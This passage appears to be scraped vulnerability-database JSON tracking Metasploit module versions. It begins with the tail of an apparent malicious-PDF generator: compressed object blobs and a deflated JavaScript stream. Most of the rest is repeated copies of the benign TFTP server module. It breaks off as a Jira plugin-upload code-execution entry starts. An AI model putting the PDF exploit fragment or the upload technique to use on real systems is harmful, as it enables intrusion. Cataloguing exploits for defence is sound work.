\"eJztV91umzAUfoK8g8UuN2OMIQkWUFWJplUqU7VGam+N7aSs/AmMQvtqvdgj7RVmEpKRNJp2M2kXWAjZ+Hzfd3zO4Uie+D66lflGPQFCMEH3TaxeSokeo1u06iaRVEwwxcKwVpVk2cS/akvGn6UCsdwkeWD8fPthgEQExoMbWVG5kE/Jl9dK3r9+XfHXZ+4J4yqc+C1tszLTZKDN0rymbWAwUcSS6nn3GRlgZ6KeA+O62wCP0R1YFJUErulAblkumM1N7MyIPf0EbAvbyJojm0BMqNU9oB9GONFvvxJr+m35uZfTq8B4UqqkCG23W3NLzKLaIOx5HrJsZNtQW8D6JVeshXn9YU9y4FnKmldJqZIiB92axUWjAsOYgMHoz5WVR6G8NndnNHmRoZaVCJsWugQS/IgpmyrduSY4kqnMZK5qjcMXcVosiv4sl2UXkeUgHic4vaFxBB0D0MVA69CoEMn6ZcmUDHXwHWi5kOAVtil2qD3VS2pZPjqzPONY6ApScsBBdhyEEpe6+KNlHzkGlud+9AX5V54MbS/5UlSrokjDfcFd86qImQJYx23gRW8zgAtO10WVMRWyskwTzrrC6CLno99bp/YqUenQhUNlXafq9OthI026TNGU5ZvAaKGQa9akygi/16ZqlY/2NmeM6D3lzqVzdX9XOHRZ8KYrsJtl2DSJoJ6Yu1NPSjhbizl0nJhBj885nErXtl3iejFzd4E5xb7jvclrxXIuD7wOn1nONNaZcjwCPcuJIXNdGwqOZ3ObxySO8YF3gB3w6tjSu6oQDZdVeMjTg4zBgpWq0T1in7MTs8kwKIM/eN8eUN8fdGtCx970LhX/ZIwio8goMoqMIqPIKPJfiQxuNzLXV5ptd3fRs/7u8wtzq37r\")\n add_compressed(32, \"eJzjtbHR93QJVjA0VzBQCNIPDfIBsi1AbDs7XgBc3QYo\")\n add_compressed(7, \"eJzjtbHRd84vzStRMNJ3yywqLlGwUDBQCNL3SYQzQyoLUvX9S0tyMvNSi+3seAF54Q8a\")\n add_compressed(16, \"eJzjtbHRd84vzStRMNT3zkwpjjYyUzBQCIrVD6ksSNUPSExPLbaz4wUA0/wLJA==\")\n add_compressed(22, \"eJzjtbHRD1Mw1DMytbPjBQARcgJ6\")\n add_compressed(10, \"eJzjtbHRd85JLC72TSxQMDRUMFAI0vdWMDQCMwISi1LzSkKKUlMVDI3RRPxSK0q8UysVDPVDKgtS9YNLikqTwRJB+fkldna8AIaCG78=\")\n add_compressed(11, \"eJzjtbHRDy5IKXIsKgGy/PXDU5OcEwtKSotS7YCAFwCW+AmR\")\n add_compressed(12, \"eJzjtbHR91YwNFUwUAjSD1AwNAAzgvVd8pNLc1PzSuzseAGGCwiD\")\n add_compressed(13, \"eJzjtbHR9yvNLY42UDA0UTBQCIq1s+MFADohBRA=\")\n add_compressed(14, \"eJzjjTY0VTBQCFKAULG8ABzfA0M=\")\n add_compressed(15, \"eJzjtbHRd9YPLkgpciwq0feONlAwjNUPUDA0UjBQCNIPSFcwMgOzgvWB8pnJOal2drwAYtsNjA==\")\n add_compressed(26, \"eJx1jk0KwkAMhU/QO+QEnRmnrQiloBXEhVBaV4qLoQ0iyGSYH9Dbm7ZrAwn54L2XZHUt9tZSDFAokNCLlmxEy1wWK3tyB/rcZS5h7kpteG53PB/i5Ck50KvyfARdLtsFp5f5a+puoHIpOuP5DqhqsfQYKPkRAz/U0pv84MyIMwwStJ41DZfoKZqIIMUQfRrjGhKYr1+HnPnEpsl+Bag7pA==\")\n add_compressed(41, \"eJzjjTa2UDBQCIrlBQAKzAIA\")\n add_compressed(54, \"eJwBzwAw/w08PC9GaWx0ZXIvRmxhdGVEZWNvZGUvTGVuZ3RoIDE1ND4+c3RyZWFtDUiJXE7BDcIwFLv3K/IFvlatYzAG66bgYSDM2/BQa6cDXWV7gv69m7d5SEISCKGs57axjpEklDFbd/MX1GQCc3jgRMaEN2oNDSVHrMeoep358/SgXQjse9Dx5w722naW29AhTU2RQ2zLkSivJNwABQyuE0pitYGO1SLSiJbxJL0XjaDpibv76UiZ7wvI+cx/rWb1V4ABAMukNiwNZW5kc3RyZWFtDcyfYBU=\")\n add_compressed(34, \"eJzjtbHRdw5WMDZTMFAI0g/WDylKzCsuSCxKzUuutLPjBQB75gjK\")\n add_compressed(35, \"eJzj1ZA6peCnxVrNzHD3v1xSmdpmTV4AOosGFg==\")\n add_compressed(33, \"eJzjjdb3dHZ2SixOTVEwslQwUAiK5QUANnUE/Q==\")\n add_compressed(29, \"eJwBEQHu/g08PC9GaWx0ZXIvRmxhdGVEZWNvZGUvTGVuZ3RoIDIxNi9OIDE+PnN0cmVhbQ1IiWJgYJzh6OLkyiTAwJCbV1LkHuQYGREZpcB+noGNgZkBDBKTiwscAwJ8QOy8/LxUBgzw7RoDI4i+rAsyC1MeL2BNLigqAdIHgNgoJbU4GUh/AeLM8pICoDhjApAtkpQNZoPUiWSHBDkD2R1ANl9JagVIjME5v6CyKDM9o0TB0NLSUsExJT8pVSG4srgkNbdYwTMvOb+oIL8osSQ1BagWagcI8LsXJVYquCfm5iYqGOkZkehyIgAoLCGszyHgMGIUO48QQ4Dk0qIyKJORyZiBASDAAEnGOC8NZW5kc3RyZWFtDYkear8=\")\n add_compressed(36, \"eJzjjdb3dHZ2SixOTVEwNlAwUAiK5QUANj4E9Q==\")\n add_compressed(30, \"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\")\n add_compressed(38, \"eJxNjbEOgjAYhJ+Ad/hHWPgplIoJaVIwaGIwRGsciAtYCFGLQx18e1vi4HDDXe6+8/IcBdAEIjiiaKw7QEqc4xw3wsedKmYgMcjBhmOAFVCsJBZGYzUAS9OEYb23u2LbkjCCn65YCr98TP0dnipA2QCxwAZitjwdVW/ayFajkBGasQwYIWGSUVitY7c+vTvzeSm8TLdRGZR+Z/SCqx3t/I92NaH1bDj3vvt1NZc=\")\n add_compressed(43, \"eJzjtbHR9wpWMDFTMFAI0g/W90osSwxOLsosKLGz4wUAaC0Hzw==\")\n add_compressed(51, \"eJxNjtEKgkAQRb9g/mG/wHHRTEF8kPCpyDIoEB/UJivQrXUF+/t2Y4seLnPhzj1ciGNMUzGXruMyo4Bzxwt9tozMXVSYCdkfXg9iHNc0dOrKAh83tZK3ueS2ZPTnK9zTKCbZ0qjxuRRtQarEfJVVSYLF1CjN+4DRkPG0be7UqiQZlaS6B8460CC7xQu/YziTBBd46gfOAjeyYRj9wiMMsAMazpb0BnLmPE4=\")\n\n js = Zlib::Deflate.deflate(js)\n add_object(46, \"\\x0d<</Filter[/FlateDecode]/Length #{js.length}>>stream\\x0d#{js}\\x0dendstream\\x0d\")\n\n add_compressed(8, \"eJzjtbHRd84vzStRMNR3yywqLlGwVDBQCNL3SYQzAxKLUoHy5mBOSGZJTqqGT35yYo6CS2ZxtqadHS8AmCkTkg==\")\n add_compressed(9, \"eJzjtbHRd0ktLok2MlMwUAjSj4iMAtLmlkYKeaU5ObH6AYlFqXklChZgyWBXBUNTMCsksyQnVePff4YshmIGPYYShgqGEk07O14AWScVgw==\")\n add_compressed(17, \"eJzjtbHR90vMTS2ONjZVMFAIUjAyAFGxdna8AF4CBlg=\")\n add_compressed(18, \"eJzjtbHR90vMTS2ONrRUMFAIUjAyAFGxdna8AF4gBlo=\")\n add_compressed(19, \"eJzj1UjLzEm10tfXd67RL0nNLdDPKtYrqSjR5AUAaRoIEQ==\")\n add_compressed(20, \"eJzjtbHRdw7RKEmtKNEvyEnMzNPU93RRMDZVMFAI0vePNjIDMWL1g/WDA4DYU8HIECwTovHvP0MWQzGDHkMJQwVDiaZ+SLCGi5WRgaGJgbGxoaGhsampUZSmnR0vAOIUGEU=\")\n add_compressed(21, \"eJzjtbHRdwxVMLRUMFAI0g8J1nCxMjIwNDEwNjY0NDQ2NTWK0rSz4wUAmbEH3g==\")\n add_compressed(39, \"eJzjtbHRd0osTnXLzyvR90jNKUstyUxO1HXKz0nRd81Lzk/JzEtXMDFVMFAI0vdLzE0FqnHK1w8uTSqpLEjVDwEShmBSH2SAnR0vACeXGlQ=\")\n add_compressed(47, \"eJzjtbHRd0osTnXLzyvR90jNKUstyUxO1HfNS85PycxLVzAxVTBQCNL3S8xNBUvrB5cmlVQWpOqHAAlDMKkP0mtnxwsAqd8Y1w==\")\n add_compressed(48, \"eJzjtbHRd0osTnXLzyvRj0osSHPJzEtPSiwp1vdLzE0Firgk6QeXJpVUFqTqhwAJQzCpD1JuZ8cLAJhsFTA=\")\n add_compressed(45, \"eJxNk81u2zAMx5+g75AnGJe0yFKgKGB0PgQYlsOaQzfswEi0LUSWUn1ky55+tJiovkQm+f+RFMXcPT3BV9N1FMgpir9WD3AIdCZQGLwDZYLKY2fpL2ifUClyCYbsegx5tJgT+N47OkIwrodkrKbF/SO8Z58ossvS4nENfcAzLZarDRyytZRAY99TuB76YIGsNadoItCoMQ5Arhyd9ZwYuoAqGW6nz8aWtJa69GEF0w8JRuNyhBOFNPgc0Wlpg9MfMFI1CnozhCzWh3/mLOkLngJqGjEcoTPcF3yLdupw18IPGdWbNjzE6Q4/xcEDsxSjAStSTxAl8q8ci+X6M7Q5eP54AJXD9AQXNtb8BP5I7oCBrQ3UxMqfLtKcD7ojvrBxPNcvK7C+Nwqt8wk+8Y+mDgL1JvJlSMOIqjREfSCCk81RZpX++Jh5YMYHSAPHqoUqJ4IxL5abeyg+PT19yaZIG2sR+N2rnvsZMapsS0ObzRR8zxiYmD4HtJ1UuDrjYvm4gqYsBjRSrZktW1NWCZp69aYsWNPCy618K3ArcDuD20ptRbMVzXam2VZNmwb4LuV2It+JfDeT766CSo3ZJnOyF9jJ4+4F3Qu6n6H7yrxJ8HXwgVeZwsg7erARUFiUMM5YlLJYU2AZA/Lf8zYGEpgEphlMlTKiMaIxM42pGuIxOCnnRe5F7mdyfxVUSpuzmRwyhCxgFjDPwFyJiwRTGcLl5v4Nr5cTv6JTnNv1z893/wElCbzZ\")\n add_compressed(23, \"eJxNzLEKgzAQgOEn8B2ymVCqd4npUEQQXQsdCp0Tc4Ol9Ep6Qh+/gg7d/+8v2rYeMgWZ+TUGIT2eLWADziE65z0ewJYApdkqzrpPHEn1U+YYRCFWYOoLp3/sV2yxsacj+A1fM6dlolXv7k5RDeEtS6b9cZvlSfrxqeQrpuuKH+VYK70=\")\n\n @xref_offset = @pdf.length\n @pdf << xref_table << trailer(25) << startxref\n\n @pdf\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-11T04:46:54", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 29}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-11T07:45:24", "history": [], "viewCount": 45, "enchantments": {"score": {"value": 4.0, "vector": "NONE", "modified": "2019-09-11T07:45:24"}, "dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:814D90A5E5ED67E300993BB603BFD072"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:E0E8BEBCCF52907348567BCF57CCF0A8"]}, {"type": "centos", "idList": ["CESA-2019:2836"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2199-1"]}, {"type": "kitploit", "idList": ["KITPLOIT:3715636905442175414"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704533"]}, {"type": "cve", "idList": ["CVE-2017-18635", "CVE-2019-12656", "CVE-2019-12668", "CVE-2019-12667", "CVE-2019-12659", "CVE-2019-10098"]}, {"type": "threatpost", "idList": ["THREATPOST:55CF21CB5462B6A570AF12025F00CFA4", "THREATPOST:A639B5ED7B8EC135EA2B35B5F8EE6DEB"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4533-1:2A15F"]}, {"type": "hackread", "idList": ["HACKREAD:F001BF69EDFC7FC342D3D7AD9CBF631D"]}, {"type": "cisco", "idList": ["CISCO-SA-20190925-SBXSS", "CISCO-SA-20190925-IOX", "CISCO-SA-20190925-HTTPSERV-DOS", "CISCO-SA-20190925-XSS"]}], "modified": "2019-09-11T07:45:24"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-11T07:45:24", "differentElements": ["sourceData"], "edition": 30}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "3d89a3b5af133f1627d72096317b7656", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-01T14:38:23", "history": [], "viewCount": 45, "enchantments": {"score": {"value": 4.8, "vector": "NONE", "modified": "2019-10-01T14:38:23"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:2950", "RHSA-2019:2949", "RHSA-2019:2946", "RHSA-2019:2938", "RHSA-2019:2937", "RHSA-2019:2936", "RHSA-2019:2935"]}, {"type": "thn", "idList": ["THN:86C3930A6E4C818EFA5133059C21FA57", "THN:7FC2242BEB1C8193593A4A37E13B4252", "THN:A947D0153E6D676ABBCCAB69CD1E73DB"]}, {"type": "rhino", "idList": ["RHINO:075E30117DB6F3FD8F52CE7802913F9F"]}, {"type": "pentestlab", "idList": ["PENTESTLAB:E9D9579FDB3190A33994E35222FB271A"]}, {"type": "exploitdb", "idList": ["EDB-ID:47450", "EDB-ID:47448"]}, {"type": "cve", "idList": ["CVE-2019-4304", "CVE-2019-4305", "CVE-2019-10498"]}, {"type": "mssecure", "idList": ["MSSECURE:273B8840FBE34F82F327AD16742071E1"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:5E10C725B6B846C3D9C332A6C5B43A8A"]}, {"type": "threatpost", "idList": ["THREATPOST:1E8692DD3729CF2A8B526A85F076513F"]}], "modified": "2019-10-01T14:38:23"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-01T14:38:23", "differentElements": ["sourceData"], "edition": 31}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-01T16:08:37", "history": [], "viewCount": 45, "enchantments": {"score": {"value": 4.6, "vector": "NONE", "modified": "2019-10-01T16:08:37"}, "dependencies": {"references": [{"type": "thn", "idList": ["THN:1EBBC3A78AD76193EC9C78495D0E85A8", "THN:86C3930A6E4C818EFA5133059C21FA57", "THN:7FC2242BEB1C8193593A4A37E13B4252"]}, {"type": "redhat", "idList": ["RHSA-2019:2950", "RHSA-2019:2949", "RHSA-2019:2946", "RHSA-2019:2938", "RHSA-2019:2937", "RHSA-2019:2936", "RHSA-2019:2935"]}, {"type": "rhino", "idList": ["RHINO:075E30117DB6F3FD8F52CE7802913F9F"]}, {"type": "pentestlab", "idList": ["PENTESTLAB:E9D9579FDB3190A33994E35222FB271A"]}, {"type": "exploitdb", "idList": ["EDB-ID:47450", "EDB-ID:47448"]}, {"type": "cve", "idList": ["CVE-2019-4304", "CVE-2019-4305", "CVE-2019-10498"]}, {"type": "mssecure", "idList": ["MSSECURE:273B8840FBE34F82F327AD16742071E1"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:5E10C725B6B846C3D9C332A6C5B43A8A"]}, {"type": "threatpost", "idList": ["THREATPOST:1E8692DD3729CF2A8B526A85F076513F"]}], "modified": "2019-10-01T16:08:37"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-01T16:08:37", "differentElements": ["description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 32}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "0937cb8d06d4d025b65f5c91dcdba867", "type": "metasploit", "bulletinFamily": "exploit", "title": "Atlassian Jira Authenticated Upload Code Execution", "description": "This module can be used to execute a payload on Atlassian Jira via the Universal Plugin Manager(UPM). The module requires valid login credentials to an account that has access to the plugin manager. The payload is uploaded as a JAR archive containing a servlet using a POST request against the UPM component. The check command will test the validity of user supplied credentials and test for access to the plugin manager.\n", "published": "2018-02-22T15:43:36", "modified": "2019-04-26T16:09:33", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-windows-system/", "https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-linux-or-mac-system/", "https://developer.atlassian.com/server/framework/atlassian-sdk/create-a-helloworld-plugin-project/"], "cvelist": [], "lastseen": "2019-10-05T10:04:14", "history": [], "viewCount": 45, "enchantments": {"score": {"value": 4.0, "vector": "NONE", "modified": "2019-10-05T10:04:14"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:2251-1"]}, {"type": "kitploit", "idList": ["KITPLOIT:751009970245130177", "KITPLOIT:1645410330277795780"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:D4A345D9C17D031176D922F3B0EA21FC"]}, {"type": "threatpost", "idList": ["THREATPOST:66DDC23E145C0FDF5849934530BC1CD9", "THREATPOST:0626AE531D93E249C5B991D156113554"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:4F29FA6ED95FBACB0B013CBB4273BE5D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:5757EE09BE22E4808719C348402D3F43"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1945-1:55523"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876871", "OPENVAS:1361412562310876876"]}, {"type": "mskb", "idList": ["KB4516065", "KB4516033"]}, {"type": "cve", "idList": ["CVE-2019-15766"]}, {"type": "msupdate", "idList": ["MS:18552C40-7E36-4F15-960A-9717A4912AF1", "MS:2CA3D95F-1ECB-4850-AEB4-AFB63CD6374A", "MS:E08D28EF-D685-412C-B0BC-8CC26BF899C3", "MS:9668152F-78A1-44F9-A229-38E86189703A", "MS:16216817-6043-4587-A803-9B3A9F3A58CC", "MS:39AB456C-2A98-4234-80FE-A3032EE6D75E"]}], "modified": "2019-10-05T10:04:14"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/jira_plugin_upload.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: 